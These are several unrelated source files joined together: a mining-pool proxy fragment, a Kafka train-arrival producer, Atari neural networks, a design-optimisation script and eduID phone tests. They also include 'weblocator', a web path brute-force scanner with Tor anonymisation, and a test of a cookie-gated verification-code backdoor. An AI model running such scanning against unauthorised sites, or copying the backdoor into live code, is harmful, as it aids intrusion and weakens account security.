    parser.add_argument('-p', '--remote-port', dest='remote_port', type=int, default=4444, help='Port of Stratum mining pool')
    parser.add_argument('-O', '--local-host', dest='local_host', type=str, default='0.0.0.0', help='On which network interface listen for stratum miners. Use "localhost" for listening on internal IP only.')
    parser.add_argument('-P', '--local-port', dest='local_port', type=int, default=8008, help='Port on which port listen for stratum miners.')
    parser.add_argument('-w', '--wallet-address', dest='wallet_address', type=str, required=True, help='Wallet address, may include rig name with "." or "/" separator')
    args = parser.parse_args()
    # set up listening parameters
    local_host = args.local_host
    local_port = args.local_port
    # set up remote targets
    remote_host = args.remote_host
    remote_port = args.remote_port
    # Split "<wallet>[./<rig>]" into wallet address and optional rig name.
    m = re.search('^(?P<wallet_addr>[^./]+)(?P<rig_name>[./].+)?', args.wallet_address)
    if m is None:
        print('Invalid wallet address, exiting...');
        sys.exit(-1)
    # Set the wallet (globals are read by request_handler in other threads).
    global wallet
    wallet = str(m.group('wallet_addr') or '')
    global worker_name
    worker_name = str(m.group('rig_name') or '')
    print "Wallet set: " + wallet + worker_name
    # now spin up our listening socket
    server_loop(local_host, local_port, remote_host, remote_port)


# Entry point when run as a script.
if __name__ == "__main__":
    main()
|
<gh_stars>0
"""Methods pertaining to loading and configuring CTA "L" station data."""
import logging
import time
from pathlib import Path
from confluent_kafka import avro
from models import Turnstile
from models.producer import Producer
import asyncio
logger = logging.getLogger(__name__)
class Station(Producer):
    """Defines a single station that produces train-arrival events to Kafka."""

    # BUG FIX: the Avro schemas were loaded from absolute paths on one
    # developer's machine; resolve them relative to this module (the
    # previously commented-out form) so the code is portable.
    key_schema = avro.load(f"{Path(__file__).parents[0]}/schemas/arrival_key.json")
    value_schema = avro.load(f"{Path(__file__).parents[0]}/schemas/arrival_value.json")

    def __init__(self, station_id, name, color, direction_a=None, direction_b=None):
        """Create the producer for the shared arrivals topic and the station's turnstile."""
        self.name = name
        station_name = (self.name.lower().replace("/", "_and_")
                        .replace(" ", "_")
                        .replace("-", "_")
                        .replace("'", "")
                        )
        # NOTE(review): station_name is currently unused — the topic below is
        # shared by all stations; confirm whether a per-station topic name
        # was intended.
        super().__init__(
            topic_name="chicago.cta.station.arrivals",
            key_schema=Station.key_schema,
            value_schema=Station.value_schema,
            num_partitions=5,
            num_replicas=1,
        )
        self.station_id = int(station_id)
        self.color = color
        self.dir_a = direction_a
        self.dir_b = direction_b
        self.a_train = None
        self.b_train = None
        self.turnstile = Turnstile(self)

    def run(self, train, direction, prev_station_id, prev_direction):
        """Simulates train arrivals at this station"""
        asyncio.run(self.run_produce(train, direction, prev_station_id, prev_direction))

    async def run_produce(self, train, direction, prev_station_id, prev_direction):
        """Schedule and await a single produce task."""
        res = asyncio.create_task(self.produce_foo(train, direction, prev_station_id, prev_direction))
        await res

    async def produce_foo(self, train, direction, prev_station_id, prev_direction):
        """Build and produce one arrival event; failures are logged, not raised."""
        try:
            val = {
                "station_id": self.station_id,
                "train_id": train.train_id,
                "direction": direction,
                # "line": self.color.name,
                # NOTE(review): hard-coded placeholder; the real value
                # (self.color.name) is commented out above — confirm which
                # one the consumers expect.
                "line": 'test_color',
                "train_status": train.status.name,
                "prev_station_id": prev_station_id,
                "prev_direction": prev_direction,
            }
            self.producer.produce(
                topic=self.topic_name,
                key={"timestamp": self.time_millis()},
                value=val,
            )
            await asyncio.sleep(0.5)
            logger.info(f'sent: {val}')
        except Exception as e:
            logger.fatal(e)
            logger.info('Yeah, the bug is poped up until here!')

    def __str__(self):
        return "Station | {:^5} | {:<30} | Direction A: | {:^5} | departing to {:<30} | Direction B: | {:^5} | departing to {:<30} | ".format(
            self.station_id,
            self.name,
            self.a_train.train_id if self.a_train is not None else "---",
            self.dir_a.name if self.dir_a is not None else "---",
            self.b_train.train_id if self.b_train is not None else "---",
            self.dir_b.name if self.dir_b is not None else "---",
        )

    def __repr__(self):
        return str(self)

    def arrive_a(self, train, prev_station_id, prev_direction):
        """Denotes a train arrival at this station in the 'a' direction"""
        self.a_train = train
        self.run(train, "a", prev_station_id, prev_direction)

    def arrive_b(self, train, prev_station_id, prev_direction):
        """Denotes a train arrival at this station in the 'b' direction"""
        self.b_train = train
        self.run(train, "b", prev_station_id, prev_direction)

    def close(self):
        """Prepares the producer for exit by cleaning up the producer"""
        self.turnstile.close()
        super(Station, self).close()
|
#######################################################################
# Copyright (C) 2017 <NAME>(<EMAIL>) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from .base_network import *
# Network for pixel Atari game with value based methods
class NatureConvNet(nn.Module, VanillaNet):
    """Value-based CNN for pixel Atari: 3 conv layers + 2 FC layers, one output per action."""

    def __init__(self, in_channels, n_actions, gpu=0):
        super(NatureConvNet, self).__init__()
        self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
        self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
        self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
        # fc4 assumes the conv stack flattens to 7*7*64 (presumably 84x84
        # input frames — confirm against the preprocessing).
        self.fc4 = nn.Linear(7 * 7 * 64, 512)
        self.fc5 = nn.Linear(512, n_actions)
        # Initialize the externally defined BasicNet mixin (device handling).
        BasicNet.__init__(self, gpu)

    def forward(self, x):
        """Return one value per action for the input batch *x*."""
        x = self.variable(x)
        y = F.relu(self.conv1(x))
        y = F.relu(self.conv2(y))
        y = F.relu(self.conv3(y))
        y = y.view(y.size(0), -1)  # flatten per sample
        y = F.relu(self.fc4(y))
        return self.fc5(y)
# Network for pixel Atari game with dueling architecture
class DuelingNatureConvNet(nn.Module, DuelingNet):
    """Nature CNN trunk with separate advantage and value heads (dueling architecture)."""

    def __init__(self, in_channels, n_actions, gpu=0):
        super(DuelingNatureConvNet, self).__init__()
        self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
        self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
        self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
        self.fc4 = nn.Linear(7 * 7 * 64, 512)
        # Heads are defined here but not applied in forward(); presumably
        # the DuelingNet base combines them from the returned features —
        # confirm in base_network.
        self.fc_advantage = nn.Linear(512, n_actions)
        self.fc_value = nn.Linear(512, 1)
        BasicNet.__init__(self, gpu)

    def forward(self, x):
        """Return the shared 512-dim feature vector (not the final Q-values)."""
        x = self.variable(x)
        y = F.relu(self.conv1(x))
        y = F.relu(self.conv2(y))
        y = F.relu(self.conv3(y))
        y = y.view(y.size(0), -1)
        phi = F.relu(self.fc4(y))
        return phi
class OpenAIActorCriticConvNet(nn.Module, ActorCriticNet):
    """
    Actor-critic CNN: four strided conv layers followed by either an LSTM
    cell or a linear layer, plus policy and value heads.
    """

    def __init__(self,
                 in_channels,
                 n_actions,
                 LSTM=False,
                 gpu=-1):
        super(OpenAIActorCriticConvNet, self).__init__()
        self.conv1 = nn.Conv2d(in_channels, 32, 3, stride=2, padding=1)
        self.conv2 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
        self.conv3 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
        self.conv4 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
        self.LSTM = LSTM
        hidden_units = 256
        # layer5 assumes the conv stack flattens to 32*3*3 features.
        if LSTM:
            self.layer5 = nn.LSTMCell(32 * 3 * 3, hidden_units)
        else:
            self.layer5 = nn.Linear(32 * 3 * 3, hidden_units)
        # Policy/value heads; not applied inside forward() — presumably
        # used by the ActorCriticNet base, confirm in base_network.
        self.fc_actor = nn.Linear(hidden_units, n_actions)
        self.fc_critic = nn.Linear(hidden_units, 1)
        BasicNet.__init__(self, gpu=gpu, LSTM=LSTM)
        if LSTM:
            # Recurrent state is stored on the module itself (batch size 1).
            self.h = self.variable(np.zeros((1, hidden_units)))
            self.c = self.variable(np.zeros((1, hidden_units)))

    def forward(self, x, update_LSTM=True):
        """
        Return the shared feature vector for *x*; when *update_LSTM* is
        True the stored recurrent state (self.h / self.c) is advanced.
        """
        x = self.variable(x)
        y = F.elu(self.conv1(x))
        y = F.elu(self.conv2(y))
        y = F.elu(self.conv3(y))
        y = F.elu(self.conv4(y))
        y = y.view(y.size(0), -1)
        if self.LSTM:
            h, c = self.layer5(y, (self.h, self.c))
            if update_LSTM:
                self.h = h
                self.c = c
            phi = h
        else:
            phi = F.elu(self.layer5(y))
        return phi
class OpenAIConvNet(nn.Module, VanillaNet):
    """Value-based variant of the OpenAI conv architecture (no recurrence)."""

    def __init__(self,
                 in_channels,
                 n_actions,
                 gpu=0):
        super(OpenAIConvNet, self).__init__()
        self.conv1 = nn.Conv2d(in_channels, 32, 3, stride=2, padding=1)
        self.conv2 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
        self.conv3 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
        self.conv4 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
        hidden_units = 256
        # layer5 assumes the conv stack flattens to 32*3*3 features.
        self.layer5 = nn.Linear(32 * 3 * 3, hidden_units)
        self.fc6 = nn.Linear(hidden_units, n_actions)
        BasicNet.__init__(self, gpu=gpu, LSTM=False)

    def forward(self, x, update_LSTM=True):
        """Return one value per action.  update_LSTM is unused here; it is
        kept for interface parity with the LSTM variant."""
        x = self.variable(x)
        y = F.elu(self.conv1(x))
        y = F.elu(self.conv2(y))
        y = F.elu(self.conv3(y))
        y = F.elu(self.conv4(y))
        y = y.view(y.size(0), -1)
        phi = F.elu(self.layer5(y))
        return self.fc6(phi)
class NatureActorCriticConvNet(nn.Module, ActorCriticNet):
    """Nature-style CNN trunk (32-channel conv3 variant) with actor and critic heads."""

    def __init__(self,
                 in_channels,
                 n_actions,
                 gpu=-1):
        super(NatureActorCriticConvNet, self).__init__()
        self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
        self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
        self.conv3 = nn.Conv2d(64, 32, kernel_size=3, stride=1)
        # fc4 assumes the conv stack flattens to 7*7*32 features.
        self.fc4 = nn.Linear(7 * 7 * 32, 512)
        # Heads applied outside forward(), presumably by ActorCriticNet.
        self.fc_actor = nn.Linear(512, n_actions)
        self.fc_critic = nn.Linear(512, 1)
        BasicNet.__init__(self, gpu=gpu)

    def forward(self, x, _):
        """Return the shared 512-dim feature vector; second argument is ignored."""
        x = self.variable(x)
        x = F.relu(self.conv1(x))
        x = F.relu(self.conv2(x))
        x = F.relu(self.conv3(x))
        x = x.view(x.size(0), -1)
        phi = F.relu(self.fc4(x))
        return phi
class CategoricalConvNet(nn.Module, CategoricalNet):
    """Distributional (categorical) CNN: outputs n_actions * n_atoms logits via the base class."""

    def __init__(self, in_channels, n_actions, n_atoms, gpu=0):
        super(CategoricalConvNet, self).__init__()
        self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
        self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
        self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
        self.fc4 = nn.Linear(7 * 7 * 64, 512)
        # Head producing one distribution per action; not applied in
        # forward() — presumably used by the CategoricalNet base, confirm.
        self.fc_categorical = nn.Linear(512, n_actions * n_atoms)
        self.n_actions = n_actions
        self.n_atoms = n_atoms
        BasicNet.__init__(self, gpu)

    def forward(self, x):
        """Return the shared 512-dim feature vector for the input batch."""
        x = self.variable(x)
        y = F.relu(self.conv1(x))
        y = F.relu(self.conv2(y))
        y = F.relu(self.conv3(y))
        y = y.view(y.size(0), -1)
        y = F.relu(self.fc4(y))
        return y
<reponame>davidtavarez/weblocator
#!/usr/bin/env python
import argparse
import os
import socket
import threading
from urllib import urlopen
import socks
from helpers import print_message, is_online, split_list, is_path_available
def create_tor_connection(address):
    """Open a SOCKS (Tor) socket connected to *address* and return it."""
    tor_sock = socks.socksocket()
    tor_sock.connect(address)
    return tor_sock
def worker(host, words_list, starting_point, port=80, http=True, validation=None):
    """Probe every candidate path in `words_list` against `host` and print hits.

    :param host: target hostname
    :param words_list: this thread's portion of the word list
    :param starting_point: base URL path prefix (e.g. '/')
    :param port: TCP port to probe
    :param http: True for http, False for https
    :param validation: optional string that must appear in the response body
    """
    protocol = 'http' if http else 'https'
    for word in words_list:
        # Words without an extension are treated as directories.
        if '.' not in word:
            word = '{}/'.format(word)
        if is_path_available(host=host, url_path=word, starting_point=starting_point, http=http, port=port,
                             validation=validation):
            print_message("\t[+] {}://{}:{}{}{}\n".format(protocol, host, port, starting_point, word))
            # BUG FIX: previously this returned on the first hit, which
            # terminated the thread and skipped the rest of its word list.
            # Keep scanning so every candidate path is checked.
if __name__ == '__main__':
    # Banner (kept verbatim).
    print_message(" __ __ _ _ _ \n")
    print_message(" \ \ / / | | | | | | \n")
    print_message(" \ \ /\ / /__| |__ | | ___ ___ __ _| |_ ___ _ __ \n")
    print_message(" \ \/ \/ / _ \ '_ \| | / _ \ / __/ _` | __/ _ \| '__| \n")
    print_message(" \ /\ / __/ |_) | |___| (_) | (_| (_| | || (_) | | \n")
    print_message(" \/ \/ \___|_.__/|______\___/ \___\__,_|\__\___/|_| \n")
    print_message(" \n")
    print_message("weblocator.py - Just another DirBuster\n")
    print_message("Version 1.0\n")
    print_message("<NAME> (davidtavarez)\n")
    print_message("https://github.com/davidtavarez/weblocator\n\n")

    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", help="The URL of the TARGET to scan.", required=True)
    parser.add_argument("-w", "--wordslist", help="The words list path.", required=True)
    # BUG FIX: the -p help text was a copy-paste of -w's ("The words list path.").
    parser.add_argument("-p", "--port", help="The port to connect to.", required=True)
    parser.add_argument("-o", "--protocol", help="Protocol (http or https).", required=True)
    parser.add_argument("-s", "--starting", help="Starting point (/).", required=True)
    parser.add_argument("--validation", help="Try to find a string to validate the results.", required=False)
    parser.add_argument("--extension", help="Add an extension.", required=False)
    parser.add_argument("--threads", help="Number of threads [default=1].", required=False)
    parser.add_argument("--tor-host", help="Tor server.", required=False)
    parser.add_argument("--tor-port", help="Tor port server.", required=False)
    args = parser.parse_args()

    protocol = 'http' if not args.protocol else args.protocol
    if protocol not in ['http', 'https']:
        print_message("ERROR: Invalid protocol.\n")
        exit(-1)
    http = True
    if protocol == 'https':
        http = False

    # Optionally route everything through a Tor SOCKS5 proxy.
    if args.tor_host:
        try:
            print_message("Opening Tor socket... ")
            socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.tor_host, int(args.tor_port), True)
            socket.socket = socks.socksocket
            socket.create_connection = create_tor_connection
            print_message("OK (" + urlopen('http://ip.42.pl/raw').read() + ").\n")
        except Exception as e:
            # BUG FIX: e.message is deprecated/unreliable; str(e) always works.
            print_message(str(e))
            exit(-1)

    if not args.target or not args.wordslist:
        print_message("ERROR: missing arguments.\n")
        exit(-1)
    if not os.path.isfile(args.wordslist):
        print_message("ERROR: words list can't be found.\n")
        exit(-1)

    print_message("Checking if " + args.target + " is online... ")
    if not is_online(args.target):
        print_message("ERROR: host is down.\n")
        exit(-1)
    print_message("OK.\n")

    # Load the word list, optionally appending the requested extension.
    words = []
    print_message("Reading the words list... ")
    word_list = open(args.wordslist)
    for line in word_list.readlines():
        word = line.strip()
        if args.extension:
            word = "{}.{}".format(word, args.extension)
        words.append(word)
    word_list.close()
    print_message("OK.\n\tThe selected file contains " + str(len(words)) + " paths.\n")

    threads = 1
    if args.threads:
        threads = int(args.threads)
    print_message("Hunting paths using " + str(threads) + " threads... just wait...\n")
    port = 80
    if args.port:
        port = int(args.port)
    starting = '/'
    if args.starting:
        starting = args.starting

    # Fan the word list out over the worker threads.
    for portion in split_list(words, threads):
        threading.Thread(target=worker, args=(args.target, portion, starting, port, http, args.validation)).start()
|
<reponame>ConnectedSystems/pyapprox
"""
Design Under Uncertainty
========================
We will use the Cantilever Beam benchmark to illustrate how to design under uncertainty.
.. figure:: ../../figures/cantilever-beam.png
:align: center
Conceptual model of the cantilever-beam
.. table:: Uncertainties
:align: center
=============== ========= =======================
Uncertainty Symbol Prior
=============== ========= =======================
Yield stress :math:`R` :math:`N(40000,2000)`
Young's modulus :math:`E` :math:`N(2.9e7,1.45e6)`
Horizontal load :math:`X` :math:`N(500,100)`
Vertical Load :math:`Y` :math:`N(1000,100)`
=============== ========= =======================
First we must specify the distribution of the random variables
"""
import numpy as np
import pyapprox as pya
from pyapprox.benchmarks.benchmarks import setup_benchmark
from functools import partial
from pyapprox.optimization import *
benchmark = setup_benchmark('cantilever_beam')
np.random.seed(1)
from pyapprox.models.wrappers import ActiveSetVariableModel
nsamples = 10
samples = pya.generate_independent_random_samples(benchmark.variable,nsamples)
fun = ActiveSetVariableModel(
benchmark.fun,benchmark.variable.num_vars()+benchmark.design_variable.num_vars(),
samples,benchmark.design_var_indices)
jac = ActiveSetVariableModel(
benchmark.jac,benchmark.variable.num_vars()+benchmark.design_variable.num_vars(),
samples,benchmark.design_var_indices)
nsamples = 10000
generate_random_samples = partial(
pya.generate_independent_random_samples,benchmark.variable,nsamples)
#set seed so that finite difference jacobian always uses the same set of samples for each
#step size and as used for computing the exact gradient
seed=1
generate_sample_data = partial(
generate_monte_carlo_quadrature_data,generate_random_samples,
benchmark.variable.num_vars(),benchmark.design_var_indices,seed=seed)
num_vars = benchmark.variable.num_vars()+benchmark.design_variable.num_vars()
objective = StatisticalConstraint(
benchmark.fun,benchmark.jac,expectation_fun,expectation_jac,num_vars,
benchmark.design_var_indices,generate_sample_data,isobjective=True)
init_guess = 2*np.ones((2,1))
errors = pya.check_gradients(
objective,objective.jacobian,init_guess,disp=False)
print(errors.min())
assert errors.min()<6e-6
from pyapprox.cvar_regression import \
smooth_conditional_value_at_risk_composition
smoother_type,eps,alpha=0,1e-3,0.75
#stat_fun = partial(smooth_conditional_value_at_risk,smoother_type,eps,alpha)
#stat_jac = True
tol=0.0
stat_fun = partial(smooth_prob_failure_fun,smoother_type,eps,tol)
stat_jac = partial(smooth_prob_failure_jac,smoother_type,eps,tol)
upper_bound=True
bound=0.05
#stat_fun,stat_jac,upper_bound = expectation_fun,expectation_jac,True
#bound=0
constraint = StatisticalConstraint(
benchmark.constraint_fun,benchmark.constraint_jac,stat_fun,stat_jac,
num_vars,benchmark.design_var_indices,generate_sample_data,bound=bound,
upper_bound=upper_bound)
print('####')
#init_guess = 3*np.ones((2,1))
init_guess = np.array([[2.3,3.4]]).T
print(constraint(init_guess))
print(approx_jacobian(constraint,init_guess,epsilon=1e-5))
print(constraint.jacobian(init_guess))
#assert False
#print(constraint(init_guess))
errors = pya.check_gradients(
constraint,constraint.jacobian,init_guess,disp=True)
#assert errors.min()<1e-7
from scipy.optimize import minimize, NonlinearConstraint
def run_design(objective, jac, constraints, constraints_jac, bounds, x0, options):
    """Solve a constrained design problem with scipy.optimize.minimize.

    :param objective: callable f(x) to minimize
    :param jac: gradient of the objective, or None
    :param constraints: list of callables; each must satisfy c(x) >= 0
    :param constraints_jac: list of constraint jacobians (or None for all-None)
    :param bounds: variable bounds passed through to minimize
    :param x0: initial guess with shape (nvars, 1)
    :param options: minimize options; 'method' and 'callback' entries are
        extracted here and passed as keyword arguments instead
    :return: (res.x, res) - the optimal point and the full result object
    """
    opts = options.copy()
    if constraints_jac is None:
        constraints_jac = [None] * len(constraints)
    # Wrap each user constraint as c(x) in [0, inf).
    scipy_constraints = [
        NonlinearConstraint(con, 0, np.inf, jac=con_jac)
        for con, con_jac in zip(constraints, constraints_jac)
    ]
    # 'method' and 'callback' are minimize kwargs, not solver options.
    method = opts.pop('method', 'slsqp')
    callback = opts.pop('callback', None)
    print(x0[:, 0])
    res = minimize(
        objective, x0[:, 0], method=method, jac=jac, hess=None,
        constraints=scipy_constraints, options=opts, callback=callback,
        bounds=bounds)
    return res.x, res
print('$$$$')
# NOTE(review): jac=None is immediately overwritten on the next line; the
# first assignment is dead and kept only for easy toggling while debugging.
jac=None
jac=objective.jacobian
# Use finite-difference jacobians for the constraint inside the optimizer.
cons_jac='2-point'
#cons_jac=constraint.jacobian
#options={'callback':lambda xk : print(xk),'disp':True,'iprint':5,'method':'slsqp'}
options={'disp':True,'verbose':2,'method':'trust-constr','gtol':1e-6}
x,res=run_design(objective,jac,[constraint],[cons_jac],benchmark.design_variable.bounds,init_guess,options)
print(res)
print(constraint(res.x)+bound)
# Empirical failure probability at the optimum, one column per constraint.
for ii in range(constraint.fun_values.shape[1]):
    print('b',np.where(constraint.fun_values[:,ii:ii+1]>0)[0].shape[0]/nsamples)
#robust design
#min f subject to variance<tol
#reliability design
#min f subject to prob failure<tol
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 NORDUnet A/S
# Copyright (c) 2018 SUNET
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# 3. Neither the name of the NORDUnet nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import json
from typing import Any, Dict, Mapping, Optional
from urllib.parse import quote_plus
from mock import patch
from eduid_common.api.testing import EduidAPITestCase
from eduid_webapp.phone.app import PhoneApp, phone_init_app
from eduid_webapp.phone.helpers import PhoneMsg
class PhoneTests(EduidAPITestCase):
app: PhoneApp
def setUp(self):
    """Set up the test case, copying the test user into the private userdb."""
    super().setUp(copy_user_to_private=True)
def load_app(self, config: Mapping[str, Any]) -> PhoneApp:
    """Build the phone Flask app under test (hook called by the base class)."""
    return phone_init_app('testing', config)
def update_config(self, config: Dict[str, Any]) -> Dict[str, Any]:
    """Merge the phone-app settings these tests rely on into `config`."""
    overrides = {
        'available_languages': {'en': 'English', 'sv': 'Svenska'},
        'msg_broker_url': 'amqp://dummy',
        'am_broker_url': 'amqp://dummy',
        'celery_config': {'result_backend': 'amqp', 'task_serializer': 'json'},
        'phone_verification_timeout': 7200,
        'default_country_code': '46',
        'throttle_resend_seconds': 300,
    }
    config.update(overrides)
    return config
# parameterized test methods
def _get_all_phone(self, eppn: Optional[str] = None):
    """
    GET all phone data for some user
    :param eppn: eppn for the user
    :return: parsed JSON response body (dict)
    """
    # Unauthenticated request must redirect to the token service.
    response = self.browser.get('/all')
    self.assertEqual(response.status_code, 302)  # Redirect to token service
    eppn = eppn or self.test_user_data['eduPersonPrincipalName']
    # Repeat with an authenticated session cookie.
    with self.session_cookie(self.browser, eppn) as client:
        response2 = client.get('/all')
        return json.loads(response2.data)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _post_phone(
    self,
    # NOTE(review): @patch decorators apply bottom-up, so the first mock
    # argument is the patched sendsms, the second get_short_hash, and the
    # third request_user_sync; the parameter names are slightly misleading.
    mock_phone_validator: Any,
    mock_code_verification: Any,
    mock_request_user_sync: Any,
    mod_data: Optional[dict] = None,
    send_data: bool = True,
):
    """
    POST phone data to add a new phone number to the test user
    :param mod_data: to control what data is POSTed
    :param send_data: whether to POST any data at all
    :return: the raw Flask response from POST /new
    """
    mock_phone_validator.return_value = True
    mock_code_verification.return_value = u'5250f9a4'
    mock_request_user_sync.side_effect = self.request_user_sync
    eppn = self.test_user_data['eduPersonPrincipalName']
    with self.session_cookie(self.browser, eppn) as client:
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                # Default payload; mod_data overrides individual keys.
                data = {
                    'number': '+34670123456',
                    'verified': False,
                    'primary': False,
                    'csrf_token': sess.get_csrf_token(),
                }
            if mod_data:
                data.update(mod_data)
        if send_data:
            return client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
        return client.post('/new')
@patch('eduid_common.api.am.AmRelay.request_user_sync')
def _post_primary(self, mock_request_user_sync: Any, mod_data: Optional[dict] = None):
    """
    Set phone number as the primary number for the test user
    :param mod_data: to control what data is POSTed
    :return: the raw Flask response from POST /primary
    """
    mock_request_user_sync.side_effect = self.request_user_sync
    # Unauthenticated request must redirect to the token service.
    response = self.browser.post('/primary')
    self.assertEqual(response.status_code, 302)  # Redirect to token service
    eppn = self.test_user_data['eduPersonPrincipalName']
    with self.session_cookie(self.browser, eppn) as client:
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                # Default target number; mod_data overrides individual keys.
                data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
            if mod_data:
                data.update(mod_data)
            return client.post('/primary', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
def _remove(self, mock_request_user_sync: Any, mod_data: Optional[dict] = None):
    """
    Remove phone number from the test user
    :param mod_data: to control what data is POSTed
    :return: the raw Flask response from POST /remove
    """
    mock_request_user_sync.side_effect = self.request_user_sync
    # Unauthenticated request must redirect to the token service.
    response = self.browser.post('/remove')
    self.assertEqual(response.status_code, 302)  # Redirect to token service
    eppn = self.test_user_data['eduPersonPrincipalName']
    with self.session_cookie(self.browser, eppn) as client:
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                # Default target number; mod_data overrides individual keys.
                data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
            if mod_data:
                data.update(mod_data)
            return client.post('/remove', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _resend_code(
    self,
    # Decorators apply bottom-up: first arg is the patched sendsms,
    # then request_user_sync, then get_short_hash.
    mock_phone_validator: Any,
    mock_request_user_sync: Any,
    mock_code_verification: Any,
    mod_data: Optional[dict] = None,
):
    """
    Send a POST request to trigger re-sending a verification code for an unverified phone number in the test user.
    :param mod_data: to control the data to be POSTed
    :return: the raw Flask response from POST /resend-code
    """
    mock_phone_validator.return_value = True
    mock_request_user_sync.side_effect = self.request_user_sync
    mock_code_verification.return_value = u'5250f9a4'
    eppn = self.test_user_data['eduPersonPrincipalName']
    with self.session_cookie(self.browser, eppn) as client:
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
            if mod_data:
                data.update(mod_data)
            return client.post('/resend-code', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _get_code_backdoor(
    self,
    # Decorators apply bottom-up: first arg is the patched sendsms,
    # then get_short_hash, then request_user_sync.
    mock_phone_validator: Any,
    mock_code_verification: Any,
    mock_request_user_sync: Any,
    mod_data: Optional[dict] = None,
    phone: str = '+34670123456',
    code: str = '5250f9a4',
):
    """
    POST phone data to generate a verification state,
    and try to get the generated code through the backdoor
    :param mod_data: to control what data is POSTed
    :param phone: the phone to use
    :param code: mock verification code
    :return: the raw Flask response from GET /get-code
    """
    mock_phone_validator.return_value = True
    mock_code_verification.return_value = code
    mock_request_user_sync.side_effect = self.request_user_sync
    eppn = self.test_user_data['eduPersonPrincipalName']
    with self.session_cookie(self.browser, eppn) as client:
        with self.app.test_request_context():
            with client.session_transaction() as sess:
                data = {
                    'number': phone,
                    'verified': False,
                    'primary': False,
                    'csrf_token': sess.get_csrf_token(),
                }
            if mod_data:
                data.update(mod_data)
            # Create the verification state for the new number.
            client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
            # The backdoor only answers when the magic cookie matches app config.
            client.set_cookie('localhost', key=self.app.conf.magic_cookie_name, value=self.app.conf.magic_cookie)
            phone = quote_plus(phone)
            eppn = quote_plus(eppn)
            return client.get(f'/get-code?phone={phone}&eppn={eppn}')
# actual tests
def test_get_all_phone(self):
    """GET /all lists both fixture numbers; the verified one is primary."""
    body = self._get_all_phone()
    self.assertEqual('GET_PHONE_ALL_SUCCESS', body['type'])
    payload = body['payload']
    self.assertIsNotNone(payload['csrf_token'])
    first, second = payload['phones'][0], payload['phones'][1]
    self.assertEqual('+34609609609', first.get('number'))
    self.assertEqual(True, first.get('primary'))
    self.assertEqual('+34 6096096096', second.get('number'))
    self.assertEqual(False, second.get('primary'))
def test_post_phone_error_no_data(self):
    """POST /new with no body at all must fail."""
    resp = self._post_phone(send_data=False)
    body = json.loads(resp.data)
    self.assertEqual('POST_PHONE_NEW_FAIL', body['type'])
def test_post_phone_country_code(self):
    """Adding a number that already carries a country code succeeds as-is."""
    # Unauthenticated request is bounced to the token service.
    resp = self.browser.post('/new')
    self.assertEqual(resp.status_code, 302)  # Redirect to token service
    resp = self._post_phone()
    self.assertEqual(resp.status_code, 200)
